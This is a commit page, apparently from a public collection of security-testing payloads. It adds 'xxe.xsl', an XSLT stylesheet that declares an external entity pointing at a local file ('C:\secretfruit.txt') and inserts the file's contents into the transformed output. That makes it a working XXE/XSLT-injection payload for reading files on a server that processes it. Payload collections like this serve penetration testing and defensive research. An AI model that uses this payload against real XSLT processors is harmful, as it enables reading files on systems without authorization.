XSLT payloads + Headless Browser
This commit is contained in:
12
XSLT Injection/Files/xxe.xsl
Normal file
12
XSLT Injection/Files/xxe.xsl
Normal file
@@ -0,0 +1,12 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
|
||||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
<xsl:template match="/fruits">
|
||||
Fruits &ext_file;:
|
||||
<!-- Loop for each fruit -->
|
||||
<xsl:for-each select="fruit">
|
||||
<!-- Print name: description -->
|
||||
- <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
|
||||
</xsl:for-each>
|
||||
</xsl:template>
|
||||
</xsl:stylesheet>
|
||||
Reference in New Issue
Block a user